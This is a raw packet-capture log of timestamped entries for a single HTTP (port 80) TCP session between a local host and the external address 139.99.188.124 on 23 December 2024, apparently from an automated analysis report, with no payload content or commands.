                                                                                                        Dec 23, 2024 08:39:41.154292107 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.154342890 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.154352903 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.158010960 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.158087969 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.158091068 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.161825895 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.161886930 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.161892891 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.165646076 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.165661097 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.165714025 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.169414043 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.169470072 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.169476986 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.173233986 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.173254013 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.173280001 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.176894903 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.176964045 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.177025080 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.180699110 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.180836916 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.180887938 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.184461117 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.184519053 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.184650898 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.188324928 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.188373089 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.188488007 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.192097902 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.192162991 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.192186117 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.195797920 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.195848942 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.195899010 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.199630976 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.199707031 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.199709892 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.203299046 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.203353882 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.203366041 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.207037926 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.207093000 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.207118034 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.210860968 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.210880041 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.210918903 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.214500904 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.214551926 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.214553118 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.218338013 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.218352079 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.218389034 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.221929073 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.222023964 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.222048998 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.225569010 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.225642920 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.225694895 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.228996992 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.229051113 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.229083061 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.232425928 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.232481956 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.232537031 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.235269070 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.235353947 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.235371113 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.238284111 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.238323927 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.238373041 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.241241932 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.241285086 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.241352081 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.244230986 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.244277000 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.244282007 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.247072935 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.247134924 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.247165918 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.249819994 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.249862909 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.249917984 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.252471924 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.252509117 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.252527952 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.254992008 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.255060911 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.329308987 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.329330921 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.329422951 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.329895973 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.330073118 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.330125093 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.331172943 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.331438065 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.331476927 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.332504988 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.332608938 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.332709074 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.333766937 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.333904028 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.333981037 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.335086107 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.335196972 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.335275888 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.336406946 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.336589098 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.336628914 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.337709904 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.337783098 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.337951899 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.339039087 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.339168072 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.339227915 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.340367079 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.340418100 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.340468884 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.341649055 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.341809034 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.341856956 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.342988014 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.343097925 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.343152046 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.344285965 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.344378948 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.344419003 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.345580101 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.345693111 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.345736980 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.347050905 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.347073078 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.347754002 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.348203897 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.348321915 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.348419905 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.349497080 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.349596024 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.349643946 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.350804090 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.350887060 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.350933075 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.352078915 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.352190971 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.353024006 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.353379965 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.353487015 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.353537083 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.354690075 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.354724884 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.354785919 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.355943918 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.356049061 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.356096983 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.357278109 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.357352018 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.357392073 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.358519077 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.358614922 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.358738899 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.359826088 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.359875917 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.359937906 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.361087084 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.361185074 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.361224890 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.362369061 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.362559080 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.362607002 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.363184929 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.363702059 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.363759995 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.363800049 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.364928961 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.365020037 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.365060091 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.366179943 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.366272926 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.366317987 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.367461920 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.367528915 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.367577076 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.368700027 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.368968964 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.369720936 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.369935989 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.370105028 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.370151043 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.371270895 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.371376038 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.371416092 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.372574091 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.372647047 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.372685909 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.373722076 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.373835087 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.373876095 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.374996901 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.375102043 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.375147104 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.376281023 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.376311064 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.376358032 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.377527952 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.377607107 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.377813101 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.378739119 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.378846884 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.378887892 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.380007982 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.380099058 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.380142927 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.381192923 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.381304026 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.381356955 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.382450104 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.382586002 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.382631063 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.383702040 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.383830070 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.383869886 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.385068893 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.385087013 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.385135889 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.386157990 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.386261940 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.386301994 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.387398958 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.387466908 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.387512922 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.388648987 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.388778925 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.388830900 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.389982939 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.390062094 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.390141964 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.391165972 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.391223907 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.391266108 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.391678095 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.392488956 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.392580986 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.392630100 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.393702030 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.393780947 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.393824100 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.394830942 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.394942999 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.395081997 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.396081924 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.396215916 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.396341085 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.397269011 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.407486916 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.521311045 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.521353006 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.521406889 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.521742105 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.521955013 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.521969080 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.522016048 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.522814989 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.522908926 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.522918940 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.523708105 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.523817062 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.523852110 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.524652004 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.524704933 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.524780989 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.525546074 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.525597095 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.525703907 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.526462078 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.526506901 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.526663065 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.527370930 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.527451038 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.527460098 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.528306961 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.528348923 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.528381109 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.529187918 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.529306889 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.529334068 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.530101061 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.530154943 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.530203104 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.531013012 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.531065941 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.531115055 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.532105923 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.532152891 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.532176018 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.532851934 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.532900095 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.532924891 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.533725023 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.533763885 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.542941093 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.543064117 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.543122053 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.543395996 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.543486118 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.543538094 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.544106960 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.544519901 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.544574022 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.544644117 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.545373917 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.545489073 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.545548916 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.546262026 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.546314001 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.546355009 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.547255993 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.547302961 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.547473907 CET8049783139.99.188.124192.168.2.6
